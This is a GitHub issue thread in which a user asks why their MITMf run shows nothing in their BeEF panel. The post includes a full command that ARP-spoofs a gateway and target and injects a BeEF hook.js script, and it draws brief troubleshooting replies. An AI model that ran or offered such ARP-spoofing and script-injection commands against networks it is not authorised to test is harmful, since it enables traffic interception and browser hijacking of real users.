### ISSUE TITLE
Mitmf and nothing happens. 

### ISSUE THREAD

**Issue by dorongal1** [byt3bl33d3r/MITMf#209]
Hello, when iam running my mitm command " ./mitmf.py -i wlan0 --gateway 10.0.0.138 --target 10.0.0.5 --spoof --arp --inject --js-url http://10.0.0.5:3000/hook.js "

the script seems to be run but i only get these 
"
127.0.0.1 - - [04/Oct/2015 18:48:30] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [04/Oct/2015 18:48:30] "GET /favicon.ico HTTP/1.1" 200 -
"
 after "SMB server online".
 (Yes i know that iam the target.)
Then, nothing happens and my BEEF panel is empty...

Can u find the problem ?:D

**Comment by zvikachu** [comment]
i think we have the same issue, 
for some reason ARP is expecting a MAC but is using the IP address 
i just opened a new issue describing the same.

please add 
--log debug
to your code and post the results

**Comment by byt3bl33d3r** [comment]
@dorongal1 ttps://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug#writing-the-report
